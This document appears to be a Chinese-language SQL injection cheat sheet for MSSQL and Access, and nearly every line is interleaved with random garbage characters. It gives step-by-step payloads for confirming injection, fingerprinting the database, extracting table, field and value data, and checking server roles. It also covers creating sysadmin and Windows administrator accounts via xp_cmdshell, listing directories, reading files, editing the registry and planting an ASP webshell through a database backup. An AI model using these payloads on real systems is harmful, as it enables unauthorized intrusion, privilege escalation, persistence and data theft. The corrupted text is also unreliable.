1.判断是否有注入;and 1=1 ;and 1=2 Ps�=<@,dks
2.初步判断是否是mssql ;and user>0 �Rf0�F`D k
FTT=��h0t�
3.注入参数是字符'and [查询条件] and ''=' Y1�s3���>`
�j�QRl-[n�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' (rB?�@:zN
OJTEvb6nPg
5.判断数据库系统 q��%\rj?U_
jdW#;
]7+y
;and (select count(*) from sysobjects)>0 mssql �{q�^?��Rw
w�W��1>#F�
;and (select count(*) from msysobjects)>0 access �!dZpV~g�0
a/s6|ri`0�
; +%|���!~
O$$�$1VHYo
6.猜数据库 ;and (select Count(*) from [数据库名])>0 NU�b��:5tL
$�,�DX^I%!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 0{zA6��Xu
�,W:�Bh$%�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 K.��I���\E
h�Ja�s�nY7
9.(1)猜字段的ascii值(access) ` �8OA:4).
>^�(Q4eU7!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 3��E`��poE
|C��_sP�,W
(2)猜字段的ascii值(mssql) T�j��_~�BT
VSQxlA�Gk@
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +�~c�W�0�z
$kCXp.#k@~
10.测试权限结构(mssql) x3�9n7+j4
;���VI�W/�
^�Z�~'>J��
�[/�Ya4=C@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _?J:Z�*z�?
v.�pj
PBU1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }Pf7Yu�UZZ
#M�5[T�N!
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �Tt*n�.H�A
(��U#9���
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �:"e,&�
%�
��Z2soy�-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 7\p<k/��TS
+�'��f38D*
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- '�@
�C\�,E
��p��G�h�A
;and 1=(select IS_MEMBER('db_owner'));-- ���3t^r;�b
L�?�~-<k��
^"hsbk�&Yu
"�J(7fL$!
11.添加mssql和系统的帐户 T����.R(
��hp6%�zUR
;exec master.dbo.sp_addlogin username;-- wU�=�@,�K�
;exec master.dbo.sp_password null,username,password;-- Y/aNrI��K7
H;nq4;�^yK
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6:�o?�@%
vJE>H4qPmD
;exec master.dbo.xp_cmdshell 'net user username password JJe��?Zu\
%U$Pc��HOo
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2gC��.Z:}�
t��E>h�j:p
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ]/C1p�G*�o
yg��-uL48q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- `fUem,$)1F
<D�!\"�C��
$�xU5vCwAo
�9�azk(OL6
12.(1)遍历目录 #�7~i��.8L
|[]"{Eo"}�
;create table dirs(paths varchar(100), id int) 2n`OcX�Ch/
'G-��zJcU�
;insert dirs exec master.dbo.xp_dirtree 'c:\' *=O~TY<�](
/92�m�5��p
;and (select top 1 paths from dirs)>0 |K��%nVcR=
WF���{rrU:
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Gj}P6��V�_
_'lrI�23�I
Tfb�a��3+V
s]p�3dB�#�
(2)遍历目录 &%/kPF�~<�
;v?�!Pml2k
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- E?/Bf@a28=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 SmJ6�Fm6��
D; 0iN�cit
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 <Hq�|<^_K�
X(;,-��7Jw
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 T;��u�>]"S
�!pN�Y`sw}
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ZxR����D+`
�K�p�o{:�a
=�os%�2�2*
UEvRK?mm�=
13.mssql中的存储过程 9V%��s1�@K
Ba�],ONM4k
xp_regenumvalues 注册表根键, 子键 �*�CH �lg1
<Eo;�CaaF/
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _e�;$Y#`EO
z$d�/Vz,a�
xp_regread 根键,子键,键值名 ,\FJVS;NeJ
Y� M_\ ZK:
;exec xp_regread �i-b++R/WN
7x�OrG],E
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 wE�R�>a (�
'14
G0<;yL
xp_regwrite 根键,子键, 值名, 值类型, 值 5�4����Baz
�xM/B"�SG2
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 i�7fQj�,
q
�poqx�
��O
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Jz�!8X�g%a
n~#%>C��7�
xp_regdeletevalue 根键,子键,值名 hK+Io��w-�
��}lk_Oe�1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 8W]�6/st?]
<�Cvlz^K�[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 H-�9%���/e
I]]3�=�?Y
1>"K<��6b+
A&2��)iQ�
14.mssql的backup创建webshell CE$c/d[N�.
�wPn�#>\/L
use model -�
T,;�Fr'
/h�ef3DV5I
create table cmd(str image); (=�H%VXQH�
��?dukK3�u
insert into cmd(str) values (''); ��TvE�� M{
S��3[�r�v
backup database model to disk='c:\l.asp'; +oZq~2?*S6
K.Tfu"6���
;��J�~N�fL
1Z �+�3=$P
15.mssql内置函数 [�=Y�@Ul�
1}C|Ja�vkn
;and (select @@version)>0 获得Windows的版本号 cp0@�w�C#d
�8Vkw�
�vc
;and user_name()='dbo' 判断当前系统的连接用户是不是sa gsn3�]^X�
O;9'0-F� ?
;and (select user_name())>0 爆当前系统的连接用户 -�;Tqd�L@
��?*��~W��
;and (select db_name())>0 得到当前连接的数据库 bUf2�uWy7�
[�<�Wo7G1s
l��CDu,r;\
�2Y�)3�Ue�
16.简洁的webshell jmbwV,@Q2�
(�KDUX
�t.
use model �Tw<��� N
a� a=GW%��
create table cmd(str image); �0I�i*
"?s
dy�RK�m�Lb
insert into cmd(str) values (''); /2K4ka�<?7
=�h?�WT�*�
backup database model to disk='g:\wwwtest\l.asp';
